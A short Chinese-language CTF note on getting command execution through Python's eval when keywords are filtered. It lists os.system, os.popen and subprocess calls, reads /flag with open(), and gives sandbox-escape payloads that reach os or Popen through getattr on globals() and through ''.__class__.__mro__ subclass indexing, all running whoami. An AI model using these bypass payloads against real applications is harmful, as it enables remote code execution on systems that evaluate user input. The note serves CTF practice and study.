python命令执行利用

之前有个ctf比赛，使用了python的eval函数执行命令，但是过滤了多个关键字，因此命令执行未能成功执行，但是可以使用open函数读取flag：open('/flag').read()
记录下python命令执行的其他姿势

0x01 已知的python执行命令的方式

1. os.system('command')
2. os.popen('command')
3. subprocess.Popen('command',shell=True)

0x02 代码执行环境已导入os的情况

# 通过python的两个内置函数调用：
getattr(globals()['os'],'system')('whoami')
getattr(locals()['os'],'system')('whoami')

0x03 通过Object对象引用

1. 查找Object对象的可以使用以下两种方式

''.__class__.__base__
''.__class__.__mro__[1]

2. 需要先找到os类或者subprocess类

for i,item in enumerate(''.__class__.__base__.__subclasses__()):
    print(i,item)

基于python3.8 查看到以下Object对象的子类

object子类

可以通过如下形式执行命令

# 若Object的子类中存在Subprocess类：
''.__class__.__mro__[-1].__subclasses__()[227]("whoami",shell=True)
# 若Object的子类中未发现Subprocess类：
getattr(__import__(''.__class__.__base__.__subclasses__()[138].__module__),'system')('whoami')

可以使用dir()方法查看一个对象的属性

properties

延伸阅读：

• Flask SSTI
• https://github.com/titusjan/objbrowser